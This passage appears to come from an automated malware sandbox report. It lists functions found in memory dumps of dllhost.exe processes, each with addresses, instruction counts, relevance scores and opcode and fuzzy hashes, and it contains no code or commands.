Opcode Fuzzy Hash: ec2cf7a0e106d5b4dd047ab8490c1d1ad06cec1a70b4c4fbab411a34e543a9f2
Instruction Fuzzy Hash: F581F423D0E5E29EE255777C78151F92BA0FFD27A4F0805B7D4888E0D7EE2C5C4A8299

Function 00007FF848F105ED Relevance: .3, Instructions: 294COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.2169719932.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ff848f10000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b7c7b3903d7c9eebae29ee6faf654ec3433551b3703b546c4fea7b37f3f791ad
Instruction ID: f842ba86f1e7f356d8130a2991f58b7e3c900c20b0150e7dfa3f14e8b7695c2d
Opcode Fuzzy Hash: b7c7b3903d7c9eebae29ee6faf654ec3433551b3703b546c4fea7b37f3f791ad
Instruction Fuzzy Hash: BD812623D0E5E29EE211777C78151F92BA0FFD23A5F0801B7D4888A0D7DA2C5C4A8399

Function 00007FF848F116D8 Relevance: .3, Instructions: 281COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.2169719932.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ff848f10000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e644703b3df9ca72c8dc147dba20c1358e0e70d966be211ebae7bda832ea442b
Instruction ID: 9d47db5b7477f55cc50459841814894283a13701d35ce8f247822db9afa3596b
Opcode Fuzzy Hash: e644703b3df9ca72c8dc147dba20c1358e0e70d966be211ebae7bda832ea442b
Instruction Fuzzy Hash: 9881AD31A1CA4A8FDB59EF1C88656B977E2FF98740F14057AE44DC32C6CF24AC428785

Function 00007FF848F10640 Relevance: .3, Instructions: 273COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.2169719932.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ff848f10000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5639860d242a8c79f030830f3395f28048b1f8e64e843f06a62156bd78e902c2
Instruction ID: e12b4ed427cd5e5359c1e9f346300e734fbcf5dba73890fbe2218ca44a26422d
Opcode Fuzzy Hash: 5639860d242a8c79f030830f3395f28048b1f8e64e843f06a62156bd78e902c2
Instruction Fuzzy Hash: C071E523D0E5E28EE255777C78161F92BA0FFD27A4F0805B7D4888A0D7DE2C5C4A8399

Function 00007FF848F11D2D Relevance: .2, Instructions: 186COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.2169719932.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ff848f10000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e7c2f5b8367e03d353a7c49a194a971480ee3766f41261ce2154d207a55fba5b
Instruction ID: 08e05f6918b1cead9a694319facf2336c3f7316130eaf01ccf0311b7ee88575f
Opcode Fuzzy Hash: e7c2f5b8367e03d353a7c49a194a971480ee3766f41261ce2154d207a55fba5b
Instruction Fuzzy Hash: 8951CF31A1CA9A8FDB48EF1888645BA77E2FB98740F14457ED44AC7282CF34EC42C785

Function 00007FF848F13165 Relevance: .1, Instructions: 143COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.2169719932.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ff848f10000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 53bd1b343b53ffa392b74bb36878e7db252e63c15570316fb1c97a1d6a30ed6c
Instruction ID: 7b5cf5ff706d6c4b0274c99d48950fef0ffcb51903da8d11dba5f3076cf24f95
Opcode Fuzzy Hash: 53bd1b343b53ffa392b74bb36878e7db252e63c15570316fb1c97a1d6a30ed6c
Instruction Fuzzy Hash: 0D513430E0860E8EEB94EB98C4596EDBBB1FF58341F50017AD00AE72D2DF386D458B58

Function 00007FF848F12145 Relevance: .1, Instructions: 141COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.2169719932.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ff848f10000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 028c5b1e2d650950d7e4c6ac441afa323cc5d07ce37787d01697630f50c8afdf
Instruction ID: c2f52038af54b3b55d3538884218edd017b7663730671f6f6fa7f301af7eb2c8
Opcode Fuzzy Hash: 028c5b1e2d650950d7e4c6ac441afa323cc5d07ce37787d01697630f50c8afdf
Instruction Fuzzy Hash: 4E412931E1D68A4FE385E7B898551B8BBE0EF8A390F0505BBD44CC71D2DF28AC418355

Function 00007FF848F1B33D Relevance: .1, Instructions: 125COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.2169719932.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ff848f10000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 52aa1e6b382be56daf119fe121e19cb9fecc7d6ab2c0e053dd0db342d0237e02
Instruction ID: 4e977ebeb7dc8030d301ffb8e3a0e375c0d180c50c8c5f444a9c1dccda7e591a
Opcode Fuzzy Hash: 52aa1e6b382be56daf119fe121e19cb9fecc7d6ab2c0e053dd0db342d0237e02
Instruction Fuzzy Hash: 5741AC71E2C94ADEE742FB6898496F9BBE0FF59351F0844B6D40CC60D2EF28A8558354

Function 00007FF848F10805 Relevance: .1, Instructions: 91COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.2169719932.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ff848f10000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 642d3465f1232c166659f27dcdd8758f26408115d73d45da1d593762c8f21285
Instruction ID: 9b59a2b7c48762c347dfc1bc6bc65970f1c6c7b1b9379034dcac8c24fd0defcf
Opcode Fuzzy Hash: 642d3465f1232c166659f27dcdd8758f26408115d73d45da1d593762c8f21285
Instruction Fuzzy Hash: FF21377290D6969FE345B77CA8592E97BD0FF413A8F080177D448CD083EF189456C395

Function 00007FF848F1A9B1 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.2169719932.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ff848f10000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae7f894ded234c5a204e01b0dfdb8df9541d64cd842c2c8718cd42ddb5ad65e9
Instruction ID: 67e188c794645471c113f738723432e69010fb9e514e622e45247f2c7a9ed8a5
Opcode Fuzzy Hash: ae7f894ded234c5a204e01b0dfdb8df9541d64cd842c2c8718cd42ddb5ad65e9
Instruction Fuzzy Hash: CF21517091864DCFDB45EF18C4596BD7BF0FF68345F05456AE809D7291DB34A850CB40

Function 00007FF848F13354 Relevance: .1, Instructions: 73COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.2169719932.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ff848f10000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c81b7de32962a5c98f2c044af54a0b8b5646a4777b86d91e724947e8f4480ae5
Instruction ID: 8716511402db7d0fe06ca6a002ee3a8397d58f55eaf4dde044fc863a827684a5
Opcode Fuzzy Hash: c81b7de32962a5c98f2c044af54a0b8b5646a4777b86d91e724947e8f4480ae5
Instruction Fuzzy Hash: 0621903184D78A8FE742EB7888585E97FF4EF5B301F0905EBD089C70A2DA2D994AC751

Function 00007FF848F134E1 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.2169719932.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ff848f10000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6750ae2a28394bd045381b6ab3fbd3f0459eeeec0f797be8f0069b5e7935bb85
Instruction ID: f50d61e7886c3a414352f7edc936ab2bb4d51ac87a8a69a72ab804299b3eb8de
Opcode Fuzzy Hash: 6750ae2a28394bd045381b6ab3fbd3f0459eeeec0f797be8f0069b5e7935bb85
Instruction Fuzzy Hash: 5B113C7090868E8FDB49EB6888596BA7BA0FF18741F0408BED45AC61D1DB39A944C704

Function 00007FF848F12E81 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.2169719932.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ff848f10000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 45f6b7a2abc832a78aa856d2dba19983cb058a5368b19ef57a6e8f48847a2bad
Instruction ID: 4ee86a17b559eeaa6eaccf352f82223947ff89b83f188f2dde5f4ebf93f3960c
Opcode Fuzzy Hash: 45f6b7a2abc832a78aa856d2dba19983cb058a5368b19ef57a6e8f48847a2bad
Instruction Fuzzy Hash: A701783091D64E8FE751FBA888886A97BE0FF59341F0544B6D40CC70A2EB38E8948704

Function 00007FF848F105D8 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.2169719932.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ff848f10000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bd313c1d2acccf73b5b2d2363fdb8153441fc2d2518e3c36126627d1483faba7
Instruction ID: 02abfc6ea6b8d918bac132b4b233c7e4d5d89cdd686b8819c3e376d7405a6b6b
Opcode Fuzzy Hash: bd313c1d2acccf73b5b2d2363fdb8153441fc2d2518e3c36126627d1483faba7
Instruction Fuzzy Hash: 44019A3090990E8FEB88EF24C4596BABBA1FF58345F10547ED40EC21C2DB32A990CB48

Function 00007FF848F1285D Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.2169719932.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ff848f10000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7446781f2496c919ae2c88e016eebffe45eafde0929041e361243e65a3ef23cd
Instruction ID: 9ba1ed8f581ce742fa098ab39fec836d8a793d7aa7e8cf0304d1bf967646cefb
Opcode Fuzzy Hash: 7446781f2496c919ae2c88e016eebffe45eafde0929041e361243e65a3ef23cd
Instruction Fuzzy Hash: EA018B3090D64E9FEB51FBA8889D6B97BE0FF59351F5544B7D408C60A2EF38E8448704

Function 00007FF848F12EF9 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.2169719932.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ff848f10000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 736a03ef64cb2f4aca4fb93d8091ddf099768dbbdcb8182763c209b044361836
Instruction ID: 374000839110052f1792d5a618425db3812719fb7fe10628f8c0cfa0c78bcec3
Opcode Fuzzy Hash: 736a03ef64cb2f4aca4fb93d8091ddf099768dbbdcb8182763c209b044361836
Instruction Fuzzy Hash: 4A01713191D6894FE742FBB488595A97BE0EF5A340F0604F6D408CB0E6EB38A844C715

Function 00007FF848F11CAD Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.2169719932.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ff848f10000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f793a950997cccc516ebe6d60e81f5925c2dbbb9fc29f80cee099341a8930d1
Instruction ID: 4e7c56c5234e285599276f46358f60bbfb0e69caefb5bd2c0d8fe49c24f8b8c0
Opcode Fuzzy Hash: 9f793a950997cccc516ebe6d60e81f5925c2dbbb9fc29f80cee099341a8930d1
Instruction Fuzzy Hash: 3C01813080D68E8FEB59EF2488592FA7BA0FF55341F4414BAE808C21D2DB769990C744

Function 00007FF848F10608 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.2169719932.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ff848f10000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7df12582c263a1a0377656d002dcefebd7dd99e6049587dfeeb0025fc773aa26
Instruction ID: 37822abbcc4d1ee92253577ba5ff98e4974758f570ad5a827b46416169419fa3
Opcode Fuzzy Hash: 7df12582c263a1a0377656d002dcefebd7dd99e6049587dfeeb0025fc773aa26
Instruction Fuzzy Hash: 8F018C30819A0E9EEB49FBA4C4582BE77A2FF18345F10087EE41EC25D1DF35A990CB04

Function 00007FF848F10610 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.2169719932.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ff848f10000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bbc1c50aebfa55a9c09473c8decc4a4eac84e3a06d99c6aeb846f14e49c3fd58
Instruction ID: 9fd982e8349309e59296aa72dc17bc16b96aa3c6b0e6ddc1fee22b776d236d66
Opcode Fuzzy Hash: bbc1c50aebfa55a9c09473c8decc4a4eac84e3a06d99c6aeb846f14e49c3fd58
Instruction Fuzzy Hash: D8018C30819A0E9FEB49FBA4C4582BAB7A0FF18355F20087EE40EC21D1DF36A950C704

Function 00007FF848F1AF0A Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.2169719932.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ff848f10000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8c9408911b09993ebaa28cfff8eaa48e0f284d2d0701c898ea88f056788df212
Instruction ID: 23415c3ca889a39be02362c3ae7f9ee4d5672cb588867010acb8c2acae405b95
Opcode Fuzzy Hash: 8c9408911b09993ebaa28cfff8eaa48e0f284d2d0701c898ea88f056788df212
Instruction Fuzzy Hash: EDF049B096CA4E9FEB51FB7884495BABAE0EF18341F0509B6E40DC60A5EF34A994C644

Function 00007FF848F105D0 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.2169719932.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ff848f10000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7d464691a04218e0d0d23469f193fe5240b083112915763c2bf1cbca55be85c2
Instruction ID: becd1eb529ff7bb2032a1178123141f63516985d3c5c0fe4ec71d9a2306c934a
Opcode Fuzzy Hash: 7d464691a04218e0d0d23469f193fe5240b083112915763c2bf1cbca55be85c2
Instruction Fuzzy Hash: D1F0963081E64E8FEB45FF6494152FA7BA4FF15345F50147AE80DC21C2DB35A990C748

Function 00007FF848F12779 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.2169719932.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ff848f10000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b83d6082a5dd9f6595d326453c20a52ad4a40ffbab40235ea2120f8127eeba1c
Instruction ID: 0d9120e9d057a19f6b7b5d4ebf1974c2b41433355fcb16976089a87bc3436bf6
Opcode Fuzzy Hash: b83d6082a5dd9f6595d326453c20a52ad4a40ffbab40235ea2120f8127eeba1c
Instruction Fuzzy Hash: 7CF0C23180E38E8FEB5AEF7488182FA3B61FF16301F4504BAD409C64D2DB38A854C741

Function 00007FF848F10FA7 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.2169719932.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ff848f10000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 12ab672eb45c10e17806214015519de11e96ebbdbe6c21c7f0c21bb3587b3572
Instruction ID: 8ad4c0527fb3e61d8c89ce4efaf7dabeee181224671962381021dd7ace9c2f51
Opcode Fuzzy Hash: 12ab672eb45c10e17806214015519de11e96ebbdbe6c21c7f0c21bb3587b3572
Instruction Fuzzy Hash: A901D630D096298FEB50FB54C8447ADB7B1EB54345F1042A9D409E7282DF386D848F58

Function 00007FF848F127ED Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.2169719932.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ff848f10000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0661a2ee7d6ffd9afc3a1bfd53a9de0ccacb782e75f8ac95605816d4a1051ed3
Instruction ID: 962ba9fd8c02b9640b666e41dc6815de756835a85ee4f98abeeaba374005ec2e
Opcode Fuzzy Hash: 0661a2ee7d6ffd9afc3a1bfd53a9de0ccacb782e75f8ac95605816d4a1051ed3
Instruction Fuzzy Hash: 82F0903080E78A8FEB59EBA484592B97BA0FF15351F4404BEE809C61D2EB399854C741

Function 00007FF848F12450 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.2169719932.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ff848f10000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d504cb188f9ac6bd6aa3c5d1fa74d503509be9ba1b11a552a60728ede4745a7
Instruction ID: cc83d3627836835a78aed240433911e727dda9f33909a6061eee2d8624080c0c
Opcode Fuzzy Hash: 3d504cb188f9ac6bd6aa3c5d1fa74d503509be9ba1b11a552a60728ede4745a7
Instruction Fuzzy Hash: B8F0C930D085298EEB64FB60C885BE8B3B1AB54341F1041BAD40D922D2DF786E94CF45

Non-executed Functions

Function 00007FF848F1387E Relevance: 5.1, Strings: 4, Instructions: 99COMMON

Download Yara Rule

Strings

/s]I, xrefs: 00007FF848F13924
0s]I, xrefs: 00007FF848F13944
.s]I, xrefs: 00007FF848F13954
8s], xrefs: 00007FF848F138D4

Memory Dump Source

Source File: 00000019.00000002.2169719932.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ff848f10000_dllhost.jbxd

Similarity

API ID:
String ID: .s]I$/s]I$0s]I$8s]
API String ID: 0-2350946736
Opcode ID: b27b8500a8700d19c7cf9dec25608a788501e09accac2d7d6b4913f5ad457383
Instruction ID: 84912d0bd71839171c12530521b0acce9fabeab243af95f79fb50967c4ae8685
Opcode Fuzzy Hash: b27b8500a8700d19c7cf9dec25608a788501e09accac2d7d6b4913f5ad457383
Instruction Fuzzy Hash: 1B31ABA281E6D25FE3135B7C1C289657FA1EF63B5075941FBC180CB0EBD60D9E0A8392

Analysis Process: dllhost.exePID: 7264, Parent PID: 1068COMMON

Executed Functions

Function 00007FF848F43565 Relevance: .3, Instructions: 274COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2200847994.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff848f40000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 382e72920b7a5fccb37aea037378f7d01365202adb51eac3e2d95174cd50c84d
Instruction ID: 5810871611a6c818aef123c203d01d6a249094ac6ce1cef3435921713edc98ff
Opcode Fuzzy Hash: 382e72920b7a5fccb37aea037378f7d01365202adb51eac3e2d95174cd50c84d
Instruction Fuzzy Hash: CF91CE31E1D94A8EE784EB2CD8597A9BFE1FF99754F50427AC009D32C6DFA828418B05

Function 00007FF848F405A0 Relevance: 1.6, Strings: 1, Instructions: 308COMMON

Download Yara Rule

Strings

_, xrefs: 00007FF848F40839

Memory Dump Source

Source File: 0000001B.00000002.2200847994.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff848f40000_dllhost.jbxd

Similarity

API ID:
String ID: _
API String ID: 0-701932520
Opcode ID: fb3829ab93ff200b3341d9649bfbe3a708fac93e3039c9ce7c1dec7bab0fe97d
Instruction ID: b5583a983c0cda1d86ca8827f946911e92efa36a9e26924eb03f809fcb6a44ee
Opcode Fuzzy Hash: fb3829ab93ff200b3341d9649bfbe3a708fac93e3039c9ce7c1dec7bab0fe97d
Instruction Fuzzy Hash: 92912A23D1E9D24EE291777C78161F53FA0FFA2AA4F1841B7D4888A0D7DE1C5806869A

Function 00007FF848F40638 Relevance: 1.5, Strings: 1, Instructions: 298COMMON

Download Yara Rule

Strings

_, xrefs: 00007FF848F40839

Memory Dump Source

Source File: 0000001B.00000002.2200847994.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff848f40000_dllhost.jbxd

Similarity

API ID:
String ID: _
API String ID: 0-701932520
Opcode ID: 9536a21feb4a80b1a71c72e7d841242284b80e40af16cb0f89ac88bb990b8928
Instruction ID: 4c4a4d8d59e318433d3375d6b294b7ea222b76ded465cf39bf5a4a43735f5878
Opcode Fuzzy Hash: 9536a21feb4a80b1a71c72e7d841242284b80e40af16cb0f89ac88bb990b8928
Instruction Fuzzy Hash: 7D812B23D1E9D24EE391777C78161F53BA0FFA2BA4F1841B7D4488A0D7DD2C5806879A

Function 00007FF848F40615 Relevance: 1.5, Strings: 1, Instructions: 296COMMON

Download Yara Rule

Strings

_, xrefs: 00007FF848F40839

Memory Dump Source

Source File: 0000001B.00000002.2200847994.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff848f40000_dllhost.jbxd

Similarity

API ID:
String ID: _
API String ID: 0-701932520
Opcode ID: d4cb2dee8d4e0d0fd3eefe7229c6b438801a42d8e5f1660ff40cdec0f642f104
Instruction ID: 29908d658b19347e109c95c1579d3651f98859e6c77f403468c1fa68f6472575
Opcode Fuzzy Hash: d4cb2dee8d4e0d0fd3eefe7229c6b438801a42d8e5f1660ff40cdec0f642f104
Instruction Fuzzy Hash: 92812B23D1E9D24EF291777C78161F53FA0FFA2AA4F1841B7D4884A0D7DE1C5806869A

Function 00007FF848F405ED Relevance: 1.5, Strings: 1, Instructions: 294COMMON

Download Yara Rule

Strings

_, xrefs: 00007FF848F40839

Memory Dump Source

Source File: 0000001B.00000002.2200847994.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff848f40000_dllhost.jbxd

Similarity

API ID:
String ID: _
API String ID: 0-701932520
Opcode ID: d47612e8c482c249a9b7d16053e715580eff86d7237dec4c8d6afa2502519ab2
Instruction ID: ee0cf53eec275d35fe0922ed8f90d6d226b7b9d41ff1e72465595db0227bc168
Opcode Fuzzy Hash: d47612e8c482c249a9b7d16053e715580eff86d7237dec4c8d6afa2502519ab2
Instruction Fuzzy Hash: 2F813B23D0E9D25FE391777C78161F53FA0FFA2AA4F1841B7D4884A0D7DA1C580A879A

Function 00007FF848F40640 Relevance: 1.5, Strings: 1, Instructions: 273COMMON

Download Yara Rule

Strings

_, xrefs: 00007FF848F40839

Memory Dump Source

Source File: 0000001B.00000002.2200847994.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff848f40000_dllhost.jbxd

Similarity

API ID:
String ID: _
API String ID: 0-701932520
Opcode ID: 309af8f5a1d8079f6ff78638156373128728fdad71f3531e5207a7f6f8b492a6
Instruction ID: bc87ae6c63f1a7c006e77fdb388b7767fca26f9ddd4cb4975c8c8c69effaa699
Opcode Fuzzy Hash: 309af8f5a1d8079f6ff78638156373128728fdad71f3531e5207a7f6f8b492a6
Instruction Fuzzy Hash: ED712923D1E9D24EE39577BC78161F53FA0FFA2AA4F1841B7D4884A0D7DE1C5806878A

Function 00007FF848F40805 Relevance: 1.3, Strings: 1, Instructions: 91COMMON

Download Yara Rule

Strings

_, xrefs: 00007FF848F40839

Memory Dump Source

Source File: 0000001B.00000002.2200847994.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff848f40000_dllhost.jbxd

Similarity

API ID:
String ID: _
API String ID: 0-701932520
Opcode ID: 142cdc991c963ea577dff0eca5852f1a6ef0cbbf35646f87ef5e7c6c3e35aa7f
Instruction ID: 84b5e925b682af095ee7caea9f5aef93b4594eef67d51fd2b9cae7fd4f346502
Opcode Fuzzy Hash: 142cdc991c963ea577dff0eca5852f1a6ef0cbbf35646f87ef5e7c6c3e35aa7f
Instruction Fuzzy Hash: 6421497290E5869FE784777CA8592EA7BD0FF61798F080077D448D90C3EE18905AC295

Function 00007FF848F40A01 Relevance: 1.3, Strings: 1, Instructions: 69COMMON

Download Yara Rule

Strings

(vH, xrefs: 00007FF848F40A70

Memory Dump Source

Source File: 0000001B.00000002.2200847994.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff848f40000_dllhost.jbxd

Similarity

API ID:
String ID: (vH
API String ID: 0-1172161155
Opcode ID: fdcac26b27cb10095b1ab54218cc36346eb10218b32edc3a3b12b973073d8f5d
Instruction ID: 99d7adf40001c5f965218fca1fea475da822a5eedd67169fd0fed67205f6b90b
Opcode Fuzzy Hash: fdcac26b27cb10095b1ab54218cc36346eb10218b32edc3a3b12b973073d8f5d
Instruction Fuzzy Hash: 6A115B31D1954E9EE780FB68C8491B97BE1FFA8790F4045B6D818E6192EF78A5448740

Function 00007FF848F4123D Relevance: 1.3, Strings: 1, Instructions: 63COMMON

Download Yara Rule

Strings

`yH, xrefs: 00007FF848F412AD

Memory Dump Source

Source File: 0000001B.00000002.2200847994.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff848f40000_dllhost.jbxd

Similarity

API ID:
String ID: `yH
API String ID: 0-612818259
Opcode ID: d334e98450ff48608cf596e992db7cf2e1b6dea759fda673967429ade7248754
Instruction ID: ab1b615171bece987b1b2e0c7604849aa3c2d56d108e76c1cb5727c88d4951a0
Opcode Fuzzy Hash: d334e98450ff48608cf596e992db7cf2e1b6dea759fda673967429ade7248754
Instruction Fuzzy Hash: E211EF30D0C96E8EEB98EB6884592B97BE0FF6A741F0405BBC00AE20D1EF286580C310

Function 00007FF848F41250 Relevance: 1.3, Strings: 1, Instructions: 41COMMON

Download Yara Rule

Strings

`yH, xrefs: 00007FF848F412AD

Memory Dump Source

Source File: 0000001B.00000002.2200847994.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff848f40000_dllhost.jbxd

Similarity

API ID:
String ID: `yH
API String ID: 0-612818259
Opcode ID: 9be17de78e2d5795edbe57233e2d5699361fc12fa1c578418771504218fa0734
Instruction ID: 9f124fc05b21424519a336603ee1552b8b6accad06afc23690c2bf647002bf0b
